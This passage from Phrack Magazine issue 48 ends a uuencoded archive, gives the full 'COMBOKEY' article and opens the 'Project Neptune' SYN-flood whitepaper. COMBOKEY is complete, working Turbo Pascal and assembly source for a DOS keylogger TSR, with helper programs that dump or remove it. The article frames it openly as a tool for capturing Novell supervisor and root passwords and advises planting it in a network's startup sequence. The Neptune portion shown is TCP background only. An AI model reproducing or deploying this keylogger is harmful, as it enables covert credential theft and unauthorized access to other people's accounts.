  9795. MG#AQXL2)$Z>FTZAZS+S@Q(E3+T[-MRPX<>+4N]/!BL6)$R=.G#AQXL2)$R=.
  9796. MG(;C-*[:PXD3IVZ</@3?Y_,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G
  9797. M3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G
  9798. M3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G
  9799. M3IPX<>+$J1E.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
  9800. MG#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
  9801. MG#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
  9802. MG#AQXL2)T_'#B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$
  9803. MB1,G3KDY/1].G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
  9804. MG#AQXL2)$R=.G)X/)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''B
  9805. MQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''B
  9806. MQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''BQ(D3)TZ<.''B
  9807. MQ(D3)TZ<.''BQ.GXX<2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
  9808. MG#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.
  9809. MG#AQXL2)$R=.G#C%AQ,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX
  9810. M<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX
  9811. M<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX
  9812. M<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX
  9813. M<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX
  9814. M<>+$B1,G3IPX<7K-<.+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G3IPX<>+$B1,G
  9815. M3IPX<>+$B1,G3IPX<>K;:<PISFG&*<9I-.<4XW2RX!3C5"XYQ3@5*TX13K/B
  9816. MAE.$T[RXX!1R.JEV6>Z=-JOXE-/+3N4RI4#EY[19Q1,*5!9.L_N+O=--2H'*
  9817. MT.DBI4!EZ#1-*5`9.HU3"E2&3DD%*D.GI`*5H5.94J`R=$HJ4#DZI12H')U2
  9818. M"E2.3BD%*D>GE`*5B=-^)WSOE%*@<G1**5`Y.I4)!2H3I\7^:N^44J"R=$HH
  9819. M4%DZ)12H+)T2"E263@D%*DNGA`*5I=.V0%6-W'&J.96;`L7I9:=M@>(4X11<
  9820. MQ4\YU9U^YQ3E%"3AQ(D3)TZ<.!6<.''BQ(D3)TZ<.''BQ(D3IW?GM"[O3E:C
  9821. MY7@QG5_.;HOUCFU[.VK[?8/M/:G=`R=.G#AQXL2)$Z<7G1Z^T\.)$R?K$R=.
  9822. MG+)V.N$4Y33B%.4TYA3E-.44Y71Y[^3S\>>=_N44Y?3TL"*G%J=RR2G&J7:8
  9823. MFE.+4^UP/J?O]X.WUX]S_VO#'CBU.-6&AW!J<;K@%.5TPRG*J3;K@5/8J5QR
  9824. MBG&JSZ+A%':JSS;B%':JS\KB%':JSU[C%':JU2=.+4ZU^L2IQ:D^*HM3T*E<
  9825. M<HIQ:HSRXQ1T:HR&Y!1T:HP:Y11T:HRNY11TJM<G3G6G<7C,&J>@4V/2**>@
  9826. MTY+3"TXMX<2)$R=.G(;N]'`^8\Z)$Z?>G(K'.0^<.''BQ(E39DZE\P@_Y.0<
  9827. M$"=.G#B];:>'7?""$R=.?3E]S]ZI"H03)TZ=.AT\MSYQXL2)$Z?!AA.G5W;R
  9828. M^7C3Z;&#S]UOX<2I'Z>#Q>G@FA,G3IPX<>+$B1,G3IPX#<QIMP%><^+$J??U
  9829. MZ0,G3IPX<>+$B1,G3IPX<>+TWIT:OP?$B1,G3IPX<>+$B1,G3IPX<>+$B1,G
  9830. M3IPX<>+$B1,G3@.X'_SD=TDX<>+$B1,G3IPX<>+$B1,G3IPX<>K$R;Q#3IQZ
  9831. M=VI](R=.G#AQXL2IX,2)4[)3U9H[3IPX=>.4&DZ<.''BQ(D3)TZ<.''BQ(G3
  9832. MD,.)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQXL2)$R=.G#AQ
  9833. MXL2)$R=.G#AQXL2I4Z?;ZJA9%>\MG#AUX%0()TZ<.''B))PX<>+$B1,GX<2I
  9834. MB_PT.?OZQ^3J?U!+`P04````"`"*=B\=14[.>F0%``#,%P``#````%1%3$5#
  9835. M05)$+E,P,9682V_<-A#'[P;\'8B]-^'P)0DY!(JLV&KL]6)7Z[B]%(9K-#DD
  9836. M*=Q>TD]?OF;T('>UBP4$:H?DC\/Y#TGQ7?_T_:\?O^R>O[Q\>_KWZS-[@#>"
  9837. MO[#=R^O7EW]8UUU>]/7Z^OZ/77/3WM5]US"PO_KR8G?3MCWC]@=@*LE*84IF
  9838. M[/_=[RV34&@&7`.K5%4QK:MB^._RHN[[+5M=M;MFVVWZ[GZ]8F#8JMO=%Z4M
  9839. M['Y^?_[RAMV]?/OQ^I,U3Z]_KCS5P?CEQ:_[=<.DX)QIX/BNM'T79GB7,[NO
  9840. M+^E=BUE]Y=Z5>]_4VYY)X^I7]J%D91^%==%VIX,OWNTPGC`R].FAOMVW*U:Q
  9841. ME6)W-_]-QAUJ//;UK:^0L[T_9+%SU5VOZ_Y^ZVL\PLH.R8W0N>U^$FOVOVW"
  9842. M``+(UU+EO%8TSEB;;AV[=;/GIR24R-G)H-;UG44!9ZO[7>-')&(#&T0/LQW:
  9843. MD=O6JT_6K$MGMG5`E&2/0"`@G`@4"(0LL$8@C(';MNEK9'+$:0>.D6_75U$"
  9844. M/OI!![;(0%>2F8)K)HMC$H@J3F=W9O:!-EYVQ3P\^_<3>PDS^TP.>SL7Q@E:
  9845. M)CV1'(CKW0(S5'1!"+[Z^3=8$DM!^+C?M:X_$1ND00!K+DIGGD<]`#D!7:E8
  9846. M`CYL-LCC69Y$'L_R1(D\7UKD7:^O(L_73WDJ\D29YQGBF9/\:QKDF2Q/(\_D
  9847. MYU/0?+H2+/&NZK[&"159H,`)%7D'*8"^M*B8[:Y'!_,!+-'!`P$D!WUID=?<
  9848. M?D)>WK\">0?\HXP0)V7$YRWYET\(@[Q)0L15*62F4YHI<.E)5B6)&QF34+E%
  9849. M3`*3%;A%[-BJ-%LQW'(MM8Y+GU'C)6/8PX1@?W_$BHY;F>S:TM0;K.4>OCNW
  9850. MS6\;ZT19Q#U!:`9*LD*Y4=UVZ]8VD=8HK"&49*'#O$:K$=%3@SZ/K30/H2T?
  9851. M;6)#`UF-FAX/W@?G0XD[F(I.#+%S]K##B3C!$3:,1`RP!:74#C;9+B<L9Y;3
  9852. M[1+R2@!4@BI)">(<)8AQ@$]2`C])"3*K!#BF!$Y*@(P2@)0`&24`*0%2)0`I
  9853. M`<Y2`BPH`7)*`%("G*4$.*X$.*($VDQEP243IO+=%4P)2Z@.2F'3-6":4ATZ
  9854. M=>Y//8_NW7+B%B[IY9R5Q@"+FAUJ^F-@B3'R)7]>5TPN["<?;'>A96GG"+A*
  9855. M3B#<5;!3I]R.,C]V!EYQ!D_'(_5!'IZ#$YXAGCF#Y\Z1YAC/'8--CJ>)I\_@
  9856. M%:O8\A!/N@HYGB*>0EZQQ/,'GM#R$,\%6.5XM+K[D@KG@05>_&R0QX`NPC('
  9857. M%`04^(`3@$X0XAC0A5CD@+1J^=*)$:R=X.$8SX48<CQ./'X&S_G'C_'*54`E
  9858. MO!)7+5_R7T'*QG!!H1(SWG57B#FNBODNW'`4GR<\QX0_%2<PX?.X,J9[BJ//
  9859. M&E\Z%0>8[WE<$;,]Q6G"Z3-P_&VW[C'E\T@3$SY%*D+25VRQA/2?5+%E%J=C
  9860. MOJ<X23B).%C"W36W6TSX/$_%=$]Y@GCB]!FMU=MM[U<U<9@I8\:G3"`FG,&4
  9861. MF/)YG(@)G^(XX?@9.($9G\=!S/<)+G[B#"<55>%J,_[$Z=O'GKFQTF7@Y!:P
  9862. M<#H%&.XN/G?;-L;'D/;]K=[<@C%$BTX^)Q,+95*T^$.=\)X/MXG!4B679A/+
  9863. MY'8+.;1MC>XJAU$/CU%OHXT`XD(VL0QW=X-%3[],\A:\,\#>:`L/I=&,XGOX
  9864. M7AA9Z$9UN/$8>RKT.',32VBMIQQ!-Y#A9G88]<A2SBR3.Q[LC:XHZ+(BL=`R
  9865. MC;VIY`(@M:@HD[%V_"-O(56-+(.J@L^CL:FI930V,9FW$(7_`5!+`0(4`!0`
  9866. M```(``Q2,!V^G@!LQ@@``.P@```,``````````$`(`````````!414Q%0U)$
  9867. M,2Y!4TU02P$"%``4````"`!*4C`=CCHX#\L(``#X'P``#``````````!`"``
  9868. M``#P"```5$5,14-21#(N05--4$L!`A0`%`````@`FT0N'<0;&V`*!0``/!<`
  9869. M``P``````````0`@````Y1$``%1%3$5#05)$+D(P,5!+`0(4`!0````(`*)$
  9870. M+AW[.7CW$P4````@```,````````````(````!D7``!414Q%0T%21"Y#35!0
  9871. M2P$"%``4````"`!K4C`=UE#(="T(````'```#````````````"````!6'```
  9872. M5$5,14-21#$N0T]$4$L!`A0`%`````@`;5(P'=:1H<KU!P```!X```P`````
  9873. M```````@````K20``%1%3$5#4D0R+D-/1%!+`0(4`!0````(`$!#'!UNJ^N<
  9874. MP`0``&(3```*``````````$`(````,PL``!024-214<N15%54$L!`A0`%```
  9875. M``@`:U(P'2C2B*Y<````?`$```P``````````0`@````M#$``%1%3$5#4D0Q
  9876. M+D524E!+`0(4`!0````(`&U2,!TIRVCV9P```)`#```,``````````$`(```
  9877. M`#HR``!414Q%0U)$,BY%4E)02P$"%``4````"`!K4C`=#LVE_>8!``"G!```
  9878. M#``````````!`"````#+,@``5$5,14-21#$N2$584$L!`A0`%`````@`;5(P
  9879. M'=V65G;,`0``800```P``````````0`@````VS0``%1%3$5#4D0R+DA%6%!+
  9880. M`0(4`!0````(`&M2,!T#9[*E[!@```1V```,``````````$`(````-$V``!4
  9881. M14Q%0U)$,2Y,4U102P$"%``4````"`!M4C`=SK(OU808``"#=0``#```````
  9882. M```!`"````#G3P``5$5,14-21#(N3%-44$L!`A0`%`````@`,Z`M'>O)T?/$
  9883. M````M0$```P``````````0`@````E6@``%1%3$5#05)$+DY%5%!+`0(4`!0`
  9884. M```(`)=`+AU%6_@T604``#X-```,````````````(````(-I``!414Q%0T%2
  9885. M1"Y00T)02P$"%``4````"`#V4C`=Q).SI$,)```@R`4`#````````````"``
  9886. M```&;P``5$5,14-!4D0N4%).4$L!`A0`%`````@`BG8O'45.SGID!0``S!<`
  9887. M``P``````````0`@````<W@``%1%3$5#05)$+E,P,5!+!08`````$0`1`-@#
  9888. (```!?@``````
  9889. `
  9890. end
  9891. sum -r/size 61640/45861 section (from "begin" to "end")
  9892. sum -r/size 58373/33263 entire input file
  9893.  
  9894. ------------------------------------------------------------------------------
  9895. <UUEncoded Part Ends Here!>.
  9896.                               ==Phrack Magazine==
  9897.  
  9898.                  Volume Seven, Issue Forty-Eight, File 12 of 18
  9899.  
  9900.  
  9901.                 COMBOKEY and the Simplistic Art of PC Hacking
  9902.                                     -or-
  9903.                               KeyTrap Revisited
  9904.  
  9905.                                   by Sendai
  9906.                          (with apologies to Dcypher)
  9907.  
  9908. NOTE: Of course I take no responsibility when you use this and get
  9909. kicked out of school or something stupid.  Besides, why would you be so
  9910. stupid as to get caught in the first place? :-) So be careful, and have
  9911. fun.  Don't get stupid.
  9912.  
  9913. WHAT YOU NEED FOR ANY OF THIS TO MAKE SENSE:
  9914. * At least a reading knowledge of TurboPascal and 8086 assembly
  9915. * A tolerable understanding of how the PC actually works or
  9916. * A copy of Queue's "MS-DOS Programmer's Reference"
  9917. * A copy of that yellow-spined "Indespensable PC Hardware Reference" book
  9918.  
  9919.  
  9920. ON WITH IT...
  9921. It was with a little dissatisfaction that I read Dcypher's KeyTrap
  9922. article the other day (so I'm back-logged a few issues, so sue me!)
  9923. I've been foolin' around with a version of this that I first wrote about
  9924. five years ago during high school, and well, I thought mine was a little
  9925. easier to understand.
  9926.  
  9927. So I'm gonna show you my version, actually explain how the damn thing
  9928. works, and hope somebody out there has their day brightened by using
  9929. this program.
  9930.  
  9931. Note that the only reason I wrote this thing was to record passwords on
  9932. a Novell net. It will record all keypresses, but it really has limited
  9933. use other than hacking.
  9934.  
  9935. Fun fact: With this program, it has taken me an average of about six
  9936. hours to snag supervisor on every Novell net I've nailed.  And I'm sure
  9937. you can do better. ;-)
  9938.  
  9939.  
  9940. PC KEYBOARD HANDLING 101
  9941. Okay, a quick review for those PC newbies out there.  When a key is
  9942. pressed on a PC, it generates an interrupt 9 (keyboard interrupt),
  9943. causing the machine to look up the address of the 9th Interrupt Service
  9944. Routine. The ISR is typically in ROM; the interrupt vector itself is
  9945. not.
  9946.  
  9947. A key recorder is a program that simply latches itself into the
  9948. interrupt 9 handler by replacing the old vector with its own address.
  9949. By doing this, every time a key is pressed, we know about it.
  9950.  
  9951.  
  9952. ENTER COMBOKEY (That'd be the key recorder)
  9953. I differ with my strategy from Dcypher in that I don't bother going
  9954. directly to the keybard hardware.  COMBOKEY just goes ahead and calls
  9955. the old ISR and then looks in the BIOS keyboard buffer to see what the
  9956. key was. Yeah, you don't get the funky-ass key combinations like
  9957. control-shift-right-alt-F2-Z, but hey, I'm just after the passwords.
  9958.  
  9959. When a new key is pressed, it's dumped in the buffer.  When the buffer
  9960. is full, nothing happens.  I'll leave writing it to a file as an
  9961. exercise to the reader.
  9962.  
  9963. My favorite feature, if I may say so myself, is the fact that COMBOKEY
  9964. has an API in it, sort of.  Interrupt 255 is also latched and provides
  9965. the "user" an interface to the presently running copy of COMBOKEY.  But
  9966. not just anyone can go poking into 255 to kill COMBOKEY or get a buffer
  9967. dump or whatever.  First, you gotta send a combination.
  9968.  
  9969. Look at the "const" section of COMBOKEY and you'll see a constant array
  9970. of four bytes.  Change these numbers to whatever the hell you want.  To
  9971. use the COMBOKEY interface you need to send each of these bytes
  9972. sequentially in AX to ISR 255.  Look at the "DoCombo" procedure in Dump
  9973. or Kill to see what I mean.
  9974.  
  9975. After you send the combo, you send one more byte that represents the
  9976. command.
  9977.  
  9978. Dump buffer:   AX=C0h    Dumps the buffer to a chunk of memory at ES:DI.
  9979. Get info:      AX=C2h    Sends a TinfoRec (see source) to ES:DI.
  9980. Kill:          AX=C1h    Deactivates the recorder.
  9981.  
  9982. There are two additional programs following: Dump and Kill.  These just
  9983. use the interface to do their appropriate actions.
  9984.  
  9985. THE PROPER ETIQUETTE OF COMBOKEY
  9986. There's a good deal of social engineering involved with using COMBOKEY.
  9987. Since it works on only the machine you put it on, you have to know where
  9988. to put it in the first place to be most effective.  (Or be really
  9989. resourceful and put it on every machine around.)
  9990.  
  9991. To maximize your amusement, get the supervisor password first, and then
  9992. put this program in the startup sequence of the network.  Then go nuts.
  9993.  
  9994. This program gets REALLY fun when your net is equipped with TCP/IP apps
  9995. like Telnet, and some moron has their home machine hooked up to the
  9996. Net, and they actually log into it  with root from your net.  Instant
  9997. party.
  9998.  
  9999. NEAT TRICKS TO TRY
  10000. If I ever get around to it, it'd be cool to use the IPX interface to
  10001. actually broadcast the keystrokes over to a waiting machine for instant
  10002. feedback.
  10003.  
  10004. The next trick to try is to maybe build a hardware version of this with
  10005. a little microcontroller.  A Motorola 68HC11 would do nicely.  This
  10006. would get rid of the pesky problem of reseting the machine or turning
  10007. the power off.
  10008.  
  10009. Ah well.  Comments and the like to jsrs@cyberspace.com.  Happy hunting.
  10010.  
  10011. -------------------------------------------------------------------------------
  10012. { Source notes:
  10013.   This'll compile on TurboPascal 6 or better.  Might even work with 5.
  10014.   Why Turbo?  Cause it generates damn tight code, and it's much more readable
  10015.   for the newbies than all assembly. }
  10016.  
  10017. {ComboKey - It's a TSR, so we gotta do the mem setup. }
  10018. {$M 1024, 0, 2100}
  10019. program ComboKey;
  10020.  
  10021. uses Dos; { For Keep() }
  10022.  
  10023. const
  10024.      DUMP_BUFFER = $C0;
  10025.      KILL_RECORDER = $C1;
  10026.      GET_INFO = $C2;
  10027.  
  10028.      BUFSIZE = 2048;     { In bytes, NOT paragraphs! }
  10029.      DISPLAY_MAX = 100;
  10030.      combo: Array[0..3] of Byte = ( 01, 01, 19, 74 );
  10031.  
  10032. type
  10033.      PBuf = ^TBuf;
  10034.      TBuf = Array[0..BUFSIZE-1] of Byte;
  10035.      PInfoRec = ^TInfoRec;
  10036.      TInfoRec = record
  10037.           buffer_size: Word;  { Word is 16 bit, unsigned }
  10038.           overwrite: Word;
  10039.           buffer_ptr: Word;
  10040.      end;
  10041.  
  10042. var
  10043.      old9o, old9s: Word; { Must be in this order! }
  10044.      wptr: Word absolute $40:$1c; { Ptr to next avail slot in kbd buffer }
  10045.      q_top: Word absolute $40:$80;
  10046.      q_bot: Word absolute $40:$82;
  10047.      buffer: PBuf;
  10048.      buf_ptr: Word;
  10049.      overwrite_ctr: Word;
  10050.      last_wptr: Word;
  10051.      tumbler: Byte; { How many numbers in the combo right so far? }
  10052.  
  10053. procedure SetVector( int: Byte; s, o: Word);
  10054.      begin
  10055.           asm
  10056.                push ds
  10057.                cli
  10058.                mov  ah, 25h
  10059.                mov  al, int
  10060.                mov  ds, s
  10061.                mov  dx, o
  10062.                int  21h
  10063.                sti
  10064.                pop  ds
  10065.           end;
  10066.      end;
  10067.  
  10068. procedure NewInt09(Flags, CS, IP, AX, BX, CX, DX, SI, DI, DS, ES, BP: Word);
  10069. interrupt;
  10070.      var
  10071.           offset: Word;
  10072.           c: Byte;
  10073.           l: Word;
  10074.           ctr: Word;
  10075.      begin
  10076.           { First call the old handler.  Do the pushf,  cause this is an
  10077.             interrupt handler. }
  10078.           asm
  10079.                pushf
  10080.                call dword ptr [old9o]   { Since old9s is next, it works }
  10081.                cli
  10082.           end;
  10083.  
  10084.           { This isn't a press, but a release - ignore it. }
  10085.           if last_wptr = wptr then Exit;
  10086.  
  10087.           last_wptr:=wptr;
  10088.  
  10089.           { Did the queue just wrap? }
  10090.           if (wptr = q_top) then offset:=q_bot-2
  10091.           else offset:=wptr-2;
  10092.  
  10093.           Inc(buf_ptr);
  10094.           if (buf_ptr = BUFSIZE) then begin { we'd write it, but oh well. }
  10095.                buf_ptr:=0;
  10096.                Inc(overwrite_ctr);
  10097.           end;
  10098.  
  10099.           buffer^[buf_ptr]:=Mem[$40:offset];
  10100.  
  10101.           asm
  10102.                sti
  10103.           end;
  10104.      end;
  10105.  
  10106. { Here's the interface system.  Don't bother saving the old $FF,
  10107. cause who uses it anyway?! }
  10108. procedure NewIntFF(Flags, CS, IP, AX, BX, CX, DX, SI, DI, DS, ES, BP: Word);
  10109. interrupt;
  10110.      var
  10111.           command: Word;
  10112.           res, rdi: Word;
  10113.           infoptr: PInfoRec;
  10114.           l: Word;
  10115.      begin
  10116.           command:=AX;
  10117.           res:=ES;
  10118.           rdi:=DI;
  10119.  
  10120.           if tumbler=4 then begin  { we have a winner... }
  10121.           tumbler:=0;
  10122.                asm
  10123.                     sti
  10124.                end;
  10125.  
  10126.                case command of
  10127.                     DUMP_BUFFER: begin
  10128.                          asm
  10129.                                    push ds
  10130.                               mov  cx, BUFSIZE
  10131.                               mov  es, [res]
  10132.                               mov  di, [rdi]
  10133.                               mov  ax, [WORD PTR buffer+2]
  10134.                               mov  ds, ax
  10135.                               mov  ax, [WORD PTR buffer]
  10136.                               mov  si, ax
  10137.  
  10138.                               cld
  10139.                               rep  movsb
  10140.                               pop  ds
  10141.                          end;
  10142.                     end;
  10143.  
  10144.                     KILL_RECORDER: begin
  10145.                          SetVector(9, old9s, old9o);
  10146.                     end;
  10147.  
  10148.                     GET_INFO: begin
  10149.                          asm
  10150.                               mov  es, [res]
  10151.                               mov  di, [rdi]
  10152.                               mov  ax, BUFSIZE
  10153.                               mov  es:[di], ax
  10154.                               mov  ax, [overwrite_ctr]
  10155.                               mov  es:[di+2], ax
  10156.                               mov  ax, [buf_ptr]
  10157.                               mov  es:[di+4], ax
  10158.                          end;
  10159.                     end;
  10160.                end;
  10161.  
  10162.                asm
  10163.                     cli
  10164.                end;
  10165.           end;
  10166.  
  10167.           if command=combo[tumbler] then Inc(tumbler)
  10168.           else tumbler:=0;
  10169.      end;
  10170.  
  10171. begin
  10172.      asm
  10173.           mov  ah, $35
  10174.           mov  al, 9
  10175.           int  $21
  10176.  
  10177.           mov  ax, es
  10178.           mov  old9s, ax
  10179.           mov  old9o, bx
  10180.      end;
  10181.  
  10182.      SetVector(9, Seg(NewInt09), Ofs(NewInt09));
  10183.      SetVector(255, Seg(NewIntFF), Ofs(NewIntFF));
  10184.  
  10185.      buffer:=New(PBuf);
  10186.      buf_ptr:=0;
  10187.      overwrite_ctr:=0;
  10188.      last_wptr:=0;
  10189.      tumbler:=0;
  10190.  
  10191.      Keep(0);
  10192. end.
  10193.  
  10194.  
  10195.  
  10196. -------------------------------------------------------------------------------
  10197.  
  10198. { Kills the keyrecorder }
  10199. program Kill;
  10200.  
  10201. const
  10202.      combo0 = 01;
  10203.      combo1 = 01;
  10204.      combo2 = 19;
  10205.      combo3 = 74;
  10206.  
  10207.      KILL_RECORDER = $C1;
  10208.  
  10209. procedure ResetCombo;
  10210.      var
  10211.      l: Word;
  10212.    begin
  10213.      for l:=1 to 4 do asm
  10214.           mov  ax, 0
  10215.          int   $ff
  10216.       end;
  10217.    end;
  10218.  
  10219. procedure DoCombo;
  10220.      begin
  10221.           asm
  10222.                mov  ax, combo0
  10223.                int  $ff
  10224.                mov  ax, combo1
  10225.                int  $ff
  10226.                mov  ax, combo2
  10227.                int  $ff
  10228.                mov  ax, combo3
  10229.                int  $ff
  10230.           end;
  10231.      end;
  10232.  
  10233. begin
  10234.      ResetCombo;
  10235.      DoCombo;
  10236.      asm
  10237.           mov  ax, KILL_RECORDER
  10238.           int  $ff
  10239.      end;
  10240. end.
  10241.  
  10242.  
  10243. -------------------------------------------------------------------------------
  10244.  
  10245. { Syntax:
  10246.      DUMP DESTFILE.FIL
  10247.  
  10248.   This'll dump the buffer information and contents to the file.  If 
  10249.   no file is given, it goes to the screen. }
  10250.  
  10251. program Dump;
  10252.  
  10253. const
  10254.      combo0 = 01;
  10255.      combo1 = 01;
  10256.      combo2 = 19;
  10257.      combo3 = 74;
  10258.  
  10259.      DUMP_BUFFER = $C0;
  10260.      GET_INFO = $C2;
  10261.  
  10262. type
  10263.      PInfoRec = ^TInfoRec;
  10264.      TInfoRec = record
  10265.           buffer_size: Word;
  10266.           overwrite: Word;
  10267.           buffer_ptr: Word;
  10268.      end;
  10269.  
  10270. var
  10271.      info: TInfoRec;
  10272.      buffer: Array[0..8191] of Byte;
  10273.      l: Word;
  10274.      f: Text;
  10275.  
  10276. procedure ResetCombo;
  10277.      var
  10278.           l: Word;
  10279.      begin
  10280.           for l:=1 to 4 do asm
  10281.                mov  ax, 0
  10282.                int  $ff
  10283.           end;
  10284.      end;
  10285.  
  10286. procedure DoCombo;
  10287.      begin
  10288.           asm
  10289.                mov  ax, combo0
  10290.                int  $ff
  10291.                mov  ax, combo1
  10292.                int  $ff
  10293.                mov  ax, combo2
  10294.                int  $ff
  10295.                mov  ax, combo3
  10296.                int  $ff
  10297.           end;
  10298.      end;
  10299.  
  10300. begin
  10301.    Assign(f, ParamStr(1));
  10302.    Rewrite(f);
  10303.  
  10304.    ResetCombo;
  10305.  
  10306.      DoCombo;
  10307.      asm
  10308.           mov  ax, SEG info
  10309.           mov  es, ax
  10310.           mov  di, OFFSET info
  10311.           mov  ax, GET_INFO
  10312.           int  $ff
  10313.      end;
  10314.  
  10315.      writeln(f,'Buffer size: ',info.buffer_size);
  10316.      writeln(f,'Buffer ptr:  ',info.buffer_ptr);
  10317.      writeln(f,'Overwrite:   ',info.overwrite);
  10318.  
  10319.      DoCombo;
  10320.      asm
  10321.           mov  ax, SEG buffer
  10322.           mov  es, ax
  10323.           mov  di, OFFSET buffer
  10324.           mov  ax, DUMP_BUFFER
  10325.           int  $ff
  10326.      end;
  10327.  
  10328.      for l:=0 to info.buffer_ptr do begin
  10329.           write(f, Char(buffer[l]));
  10330.           if buffer[l] = 13 then write(f,#10);
  10331.      end;
  10332.      
  10333.      Close(f);
  10334. end.
  10335.  
  10336.                             ==Phrack Magazine==
  10337.  
  10338.              Volume Seven, Issue Forty-Eight, File 13 of 18
  10339.  
  10340.  
  10341.                  [ Project Neptune ]
  10342.  
  10343.             by daemon9 / route / infinity
  10344.                  for Phrack Magazine
  10345.               July 1996 Guild Productions, kid
  10346.  
  10347.                comments to route@infonexus.com
  10348.  
  10349.  
  10350.     This project is a comprehensive analysis of TCP SYN flooding.  You 
  10351. may be wondering, why such a copious treatment of TCP SYN flooding?  
  10352. Apparently, someone had to do it.  That someone turned out to be me (I need
  10353. a real hobby).  The SYNflood Project consists of this whitepaper, including 
  10354. anotated network monitor dumps and fully functional robust Linux sourcecode.
  10355.  
  10356.  
  10357.         --[ Introduction ]--
  10358.  
  10359.  
  10360.     TCP SYN flooding is a denial of service (DOS) attack.  Like most DOS
  10361. attacks, it does not exploit a software bug, but rather a shortcoming in the
  10362. implemenation of a particular protocol.  For example, mail bombing DOS attacks
  10363. work because most SMTP agents are dumb and will accept whatever is sent their 
  10364. way.  ICMP_ECHO floods exploit the fact that most kernels will simply reply to
  10365. ICMP_ECHO request packets one after another, ad inifintum.  We will see that
  10366. TCP SYN flood DOS attacks work because of the current implementation of TCP's
  10367. connection establishment protocol.
  10368.  
  10369.  
  10370.         --[ Overview  ]--
  10371.  
  10372.  
  10373.     This whitepaper is intended as a complete introduction to TCP SYN 
  10374. flooding (refered to hereafter as SYN flooding).  It will cover the attack
  10375. in detail, including all relevant necessary background information.  It is 
  10376. organized into sections:
  10377.  
  10378.     Section I.    TCP Background Information
  10379.     Section II.    TCP Memory Structures and the Backlog
  10380.     Section III.    TCP Input Processing
  10381.     Section IV.    The Attack
  10382.     Section V.    Network Trace
  10383.     Section VI.    Neptune.c
  10384.     Section VII.    Discussion and Prevention
  10385.     Section VIII.    References
  10386.  
  10387. (Note that readers unfamiliar with the TCP/IP protocol suite may wish to first
  10388. read ftp://ftp.infonexus.com/pub/Philes/NetTech/TCP-IP/tcipIp.intro.txt.gz)
  10389.  
  10390.  
  10391.              --[ The Players ]--
  10392.  
  10393.  
  10394.                 A:      Target host
  10395.                 X:      Unreachable host 
  10396.                 Z:      Attacking host
  10397.          Z(x):    Attacker masquerading as the unreachable
  10398.  
  10399.  
  10400.                 --[ The Figures ]--
  10401.                 
  10402.  
  10403.                 There are a few network transaction  figures in the paper and
  10404. they are to be interpreted as per the following example:
  10405.  
  10406.        tick   host a      control     host b
  10407.  
  10408. tick:   
  10409.     A unit of time.  There is no distinction made as to *how* much time 
  10410. passes between ticks, just that time passes.  It's generally not going to be
  10411. a great deal. 
  10412. host a: 
  10413.     A machine particpating in a TCP-based conversation.
  10414. control: 
  10415.     This field shows any relevant control bits set in the TCP header and 
  10416. the direction the data is flowing
  10417. host b: 
  10418.     A machine particpating in a TCP-based conversation.
  10419.  
  10420. For example:
  10421.  
  10422.         1       A       ---SYN--->      B       
  10423.  
  10424.     In this case, at the first refrenced point in time, host a is sending
  10425. a TCP segment to host b with the SYN bit on.  Unless stated, we are generally 
  10426. not concerned with the data portion of the TCP segment.
  10427.  
  10428.  
  10429.  
  10430.         Section I.    TCP Background Information
  10431.  
  10432.  
  10433.  
  10434.     TCP is a connection-oriented, reliable transport protocol.  TCP is
  10435. responsible for hiding network intricacies from the upper layers.  A 
  10436. connection-oriented protcol implies that the two hosts participating in a 
  10437. discussion must first establish a connection before data may be exchanged.  In
  10438. TCP's case, this is done with the three-way handshake.  Reliability can be 
  10439. provided in a number of ways, but the only two we are concerned with are data 
  10440. sequencing and acknowledgement.  TCP assigns sequence numbers to every byte in
  10441. every segment and acknowledges all data bytes recieved from the other end.  
  10442. (ACK's consume a sequence number, but are not themselves ACK'd.  That would be
  10443. ludicris.)  
  10444.  
  10445.  
  10446.                 --[ TCP Connection Establishment ]--
  10447.  
  10448.  
  10449.      In order to exchange data using TCP, hosts must establish a connection.
  10450. TCP establishes a connection in a 3 step process called the 3-way handshake.
  10451. If machine A is running a client program and wishes to conect to a server
  10452. program on machine B, the process is as follows:
  10453.  
  10454.                         fig(1)
  10455.        
  10456.         1       A       ---SYN--->      B       
  10457.  
  10458.         2       A    <---SYN/ACK---     B
  10459.  
  10460.         3       A       ---ACK--->      B
  10461.  
  10462.                                 
  10463.     At (1) the client is telling the server that it wants a connection.
  10464. This is the SYN flag's only purpose.  The client is telling the server that 
  10465. the sequence number field is valid, and should be checked.  The client will 
  10466. set the sequence number field in the TCP header to it's ISN (initial sequence
  10467. number).  The server, upon receiving this segment (2) will respond with it's 
  10468. own ISN (therefore the SYN flag is on) and an ACKnowledgement of the clients 
  10469. first segment (which is the client's ISN+1).  The client then ACK's the 
  10470. server's ISN (3).  Now data transfer may take place.
  10471.  
